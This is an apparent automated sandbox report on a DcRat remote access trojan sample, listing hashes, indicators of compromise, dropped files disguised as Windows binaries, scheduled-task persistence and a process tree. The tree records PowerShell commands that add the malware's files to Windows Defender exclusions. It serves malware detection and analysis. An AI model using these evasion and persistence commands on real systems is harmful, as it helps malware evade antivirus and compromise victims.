dcrat | 579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370

Analysis

max time kernel
150s
max time network
147s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
02-02-2023 18:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370.exe
Size

1.3MB
MD5

f9b18ae30c53fcf13cef8943c98e722e
SHA1

94b8c4eedfcf4c8b18bd3dc801b7079c4e6e93a6
SHA256

579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370
SHA512

2b99c4584d4d848743c3868aae2a41f95382a74f9b331b38c4427f983c943071cbf9c21f0666587fafb27b336f848b5bfc6e8e0aace8b0cdf21b5e3a4f9aedf2
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4928	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1928	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4388	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3208	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4896	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	436	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4780	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4864	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	844	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	788	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1144	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	660	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	528	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1540	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1512	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1836	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1816	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1224	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1180	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1152	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1596	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	880	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3376	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3360	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	208	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	212	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	320	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1384	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2624	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2412	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2284	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2536	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	536	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2520	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	940	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1060	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2604	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1856	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2684	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2484	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2352	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1936	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2984	1608	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2948	1608	schtasks.exe

DCRat payload 17 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\providercommon\DllCommonsvc.exe	dcrat
C:\providercommon\DllCommonsvc.exe	dcrat
behavioral1/memory/3244-286-0x0000000000F70000-0x0000000001080000-memory.dmp	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat
C:\Windows\Installer\fontdrvhost.exe	dcrat

Executes dropped EXE 14 IoCs

Processes:

DllCommonsvc.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exe

pid	process
3244	DllCommonsvc.exe
2936	fontdrvhost.exe
5776	fontdrvhost.exe
5964	fontdrvhost.exe
5212	fontdrvhost.exe
5352	fontdrvhost.exe
4832	fontdrvhost.exe
5468	fontdrvhost.exe
4132	fontdrvhost.exe
388	fontdrvhost.exe
2336	fontdrvhost.exe
5048	fontdrvhost.exe
3468	fontdrvhost.exe
3988	fontdrvhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Program Files directory 6 IoCs

Processes:

DllCommonsvc.exe

description	ioc	process
File created	C:\Program Files\Windows Photo Viewer\fr-FR\sppsvc.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Photo Viewer\fr-FR\0a1fd5f707cd16	DllCommonsvc.exe
File created	C:\Program Files\Windows Mail\en-US\System.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Mail\en-US\27d1bcfc3c54e0	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\5b884080fd4f94	DllCommonsvc.exe

Drops file in Windows directory 7 IoCs

Processes:

DllCommonsvc.exe

description	ioc	process
File created	C:\Windows\Installer\5b884080fd4f94	DllCommonsvc.exe
File created	C:\Windows\rescache\_merged\1742034116\conhost.exe	DllCommonsvc.exe
File created	C:\Windows\ModemLogs\sppsvc.exe	DllCommonsvc.exe
File created	C:\Windows\ModemLogs\0a1fd5f707cd16	DllCommonsvc.exe
File created	C:\Windows\TAPI\csrss.exe	DllCommonsvc.exe
File created	C:\Windows\TAPI\886983d96e3d3e	DllCommonsvc.exe
File created	C:\Windows\Installer\fontdrvhost.exe	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
1928	schtasks.exe
4780	schtasks.exe
844	schtasks.exe
1384	schtasks.exe
2284	schtasks.exe
2484	schtasks.exe
1836	schtasks.exe
880	schtasks.exe
2624	schtasks.exe
2520	schtasks.exe
1060	schtasks.exe
4388	schtasks.exe
4864	schtasks.exe
2576	schtasks.exe
1936	schtasks.exe
536	schtasks.exe
3208	schtasks.exe
4880	schtasks.exe
788	schtasks.exe
1144	schtasks.exe
1512	schtasks.exe
1816	schtasks.exe
1180	schtasks.exe
940	schtasks.exe
2604	schtasks.exe
1436	schtasks.exe
4776	schtasks.exe
660	schtasks.exe
2536	schtasks.exe
2352	schtasks.exe
436	schtasks.exe
1152	schtasks.exe
208	schtasks.exe
2984	schtasks.exe
2948	schtasks.exe
4928	schtasks.exe
1224	schtasks.exe
1596	schtasks.exe
2412	schtasks.exe
4896	schtasks.exe
528	schtasks.exe
1540	schtasks.exe
3376	schtasks.exe
3360	schtasks.exe
212	schtasks.exe
320	schtasks.exe
1856	schtasks.exe
2684	schtasks.exe

Modifies registry class 14 IoCs

Processes:

fontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exeDllCommonsvc.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exefontdrvhost.exe579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370.exefontdrvhost.exefontdrvhost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	fontdrvhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

DllCommonsvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3244	DllCommonsvc.exe
3244	DllCommonsvc.exe
3244	DllCommonsvc.exe
3244	DllCommonsvc.exe
3244	DllCommonsvc.exe
3244	DllCommonsvc.exe
3244	DllCommonsvc.exe
3244	DllCommonsvc.exe
3244	DllCommonsvc.exe
4024	powershell.exe
4024	powershell.exe
1896	powershell.exe
1896	powershell.exe
4412	powershell.exe
4412	powershell.exe
2172	powershell.exe
2172	powershell.exe
3020	powershell.exe
3020	powershell.exe
4792	powershell.exe
4792	powershell.exe
1848	powershell.exe
1848	powershell.exe
2364	powershell.exe
2364	powershell.exe
3932	powershell.exe
3932	powershell.exe
2224	powershell.exe
2224	powershell.exe
4064	powershell.exe
4064	powershell.exe
2972	powershell.exe
2972	powershell.exe
4008	powershell.exe
4008	powershell.exe
3868	powershell.exe
3868	powershell.exe
4556	powershell.exe
4556	powershell.exe
4136	powershell.exe
4136	powershell.exe
4024	powershell.exe
4024	powershell.exe
1896	powershell.exe
1896	powershell.exe
4412	powershell.exe
2172	powershell.exe
3020	powershell.exe
3932	powershell.exe
4792	powershell.exe
2972	powershell.exe
2364	powershell.exe
4008	powershell.exe
1848	powershell.exe
2224	powershell.exe
4064	powershell.exe
4556	powershell.exe
3868	powershell.exe
4136	powershell.exe
4024	powershell.exe
2364	powershell.exe
2224	powershell.exe
4008	powershell.exe
4556	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	3244	DllCommonsvc.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	2172	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	4792	powershell.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeDebugPrivilege	3868	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeIncreaseQuotaPrivilege	4024	powershell.exe
Token: SeSecurityPrivilege	4024	powershell.exe
Token: SeTakeOwnershipPrivilege	4024	powershell.exe
Token: SeLoadDriverPrivilege	4024	powershell.exe
Token: SeSystemProfilePrivilege	4024	powershell.exe
Token: SeSystemtimePrivilege	4024	powershell.exe
Token: SeProfSingleProcessPrivilege	4024	powershell.exe
Token: SeIncBasePriorityPrivilege	4024	powershell.exe
Token: SeCreatePagefilePrivilege	4024	powershell.exe
Token: SeBackupPrivilege	4024	powershell.exe
Token: SeRestorePrivilege	4024	powershell.exe
Token: SeShutdownPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeSystemEnvironmentPrivilege	4024	powershell.exe
Token: SeRemoteShutdownPrivilege	4024	powershell.exe
Token: SeUndockPrivilege	4024	powershell.exe
Token: SeManageVolumePrivilege	4024	powershell.exe
Token: 33	4024	powershell.exe
Token: 34	4024	powershell.exe
Token: 35	4024	powershell.exe
Token: 36	4024	powershell.exe
Token: SeIncreaseQuotaPrivilege	2224	powershell.exe
Token: SeSecurityPrivilege	2224	powershell.exe
Token: SeTakeOwnershipPrivilege	2224	powershell.exe
Token: SeLoadDriverPrivilege	2224	powershell.exe
Token: SeSystemProfilePrivilege	2224	powershell.exe
Token: SeSystemtimePrivilege	2224	powershell.exe
Token: SeProfSingleProcessPrivilege	2224	powershell.exe
Token: SeIncBasePriorityPrivilege	2224	powershell.exe
Token: SeCreatePagefilePrivilege	2224	powershell.exe
Token: SeBackupPrivilege	2224	powershell.exe
Token: SeRestorePrivilege	2224	powershell.exe
Token: SeShutdownPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeSystemEnvironmentPrivilege	2224	powershell.exe
Token: SeRemoteShutdownPrivilege	2224	powershell.exe
Token: SeUndockPrivilege	2224	powershell.exe
Token: SeManageVolumePrivilege	2224	powershell.exe
Token: 33	2224	powershell.exe
Token: 34	2224	powershell.exe
Token: 35	2224	powershell.exe
Token: 36	2224	powershell.exe
Token: SeIncreaseQuotaPrivilege	2364	powershell.exe
Token: SeSecurityPrivilege	2364	powershell.exe
Token: SeTakeOwnershipPrivilege	2364	powershell.exe
Token: SeLoadDriverPrivilege	2364	powershell.exe
Token: SeSystemProfilePrivilege	2364	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370.exeWScript.execmd.exeDllCommonsvc.execmd.execmd.exefontdrvhost.execmd.exefontdrvhost.execmd.exe

description	pid	process	target process
PID 3856 wrote to memory of 4636	3856	579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370.exe	WScript.exe
PID 3856 wrote to memory of 4636	3856	579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370.exe	WScript.exe
PID 3856 wrote to memory of 4636	3856	579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370.exe	WScript.exe
PID 4636 wrote to memory of 4296	4636	WScript.exe	cmd.exe
PID 4636 wrote to memory of 4296	4636	WScript.exe	cmd.exe
PID 4636 wrote to memory of 4296	4636	WScript.exe	cmd.exe
PID 4296 wrote to memory of 3244	4296	cmd.exe	DllCommonsvc.exe
PID 4296 wrote to memory of 3244	4296	cmd.exe	DllCommonsvc.exe
PID 3244 wrote to memory of 3912	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 3912	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4024	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4024	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 1896	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 1896	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4412	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4412	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 3020	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 3020	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 2172	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 2172	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 1848	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 1848	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4792	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4792	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 2364	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 2364	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 3932	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 3932	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4064	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4064	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 2224	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 2224	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 2972	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 2972	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 3868	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 3868	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4008	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4008	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4556	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4556	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4136	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 4136	3244	DllCommonsvc.exe	powershell.exe
PID 3244 wrote to memory of 1544	3244	DllCommonsvc.exe	cmd.exe
PID 3244 wrote to memory of 1544	3244	DllCommonsvc.exe	cmd.exe
PID 1544 wrote to memory of 5112	1544	cmd.exe	w32tm.exe
PID 1544 wrote to memory of 5112	1544	cmd.exe	w32tm.exe
PID 1544 wrote to memory of 2936	1544	cmd.exe	fontdrvhost.exe
PID 1544 wrote to memory of 2936	1544	cmd.exe	fontdrvhost.exe
PID 5344 wrote to memory of 5432	5344	cmd.exe	w32tm.exe
PID 5344 wrote to memory of 5432	5344	cmd.exe	w32tm.exe
PID 5344 wrote to memory of 5776	5344	cmd.exe	fontdrvhost.exe
PID 5344 wrote to memory of 5776	5344	cmd.exe	fontdrvhost.exe
PID 5776 wrote to memory of 5884	5776	fontdrvhost.exe	cmd.exe
PID 5776 wrote to memory of 5884	5776	fontdrvhost.exe	cmd.exe
PID 5884 wrote to memory of 5940	5884	cmd.exe	w32tm.exe
PID 5884 wrote to memory of 5940	5884	cmd.exe	w32tm.exe
PID 5884 wrote to memory of 5964	5884	cmd.exe	fontdrvhost.exe
PID 5884 wrote to memory of 5964	5884	cmd.exe	fontdrvhost.exe
PID 5964 wrote to memory of 6080	5964	fontdrvhost.exe	cmd.exe
PID 5964 wrote to memory of 6080	5964	fontdrvhost.exe	cmd.exe
PID 6080 wrote to memory of 6132	6080	cmd.exe	w32tm.exe
PID 6080 wrote to memory of 6132	6080	cmd.exe	w32tm.exe
PID 6080 wrote to memory of 5212	6080	cmd.exe	fontdrvhost.exe
PID 6080 wrote to memory of 5212	6080	cmd.exe	fontdrvhost.exe

C:\Users\Admin\AppData\Local\Temp\579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370.exe
"C:\Users\Admin\AppData\Local\Temp\579b8620f7598d012c786ed50f75098c630eda9590fba323ff80b6a3876e6370.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3856

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4296

C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
5⤵
PID:3912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\lsass.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Idle.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\SearchUI.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\sppsvc.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sppsvc.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\en-US\System.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\Idle.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\csrss.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\System.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\Idle.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Start Menu\System.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\fontdrvhost.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\fr-FR\sppsvc.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\EunsIO9tk2.bat"
5⤵
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
6⤵
PID:5112

C:\Windows\Installer\fontdrvhost.exe
"C:\Windows\Installer\fontdrvhost.exe"
6⤵
- Executes dropped EXE
- Modifies registry class
PID:2936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CxpWyGgMb4.bat"
7⤵
- Suspicious use of WriteProcessMemory
PID:5344

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
8⤵
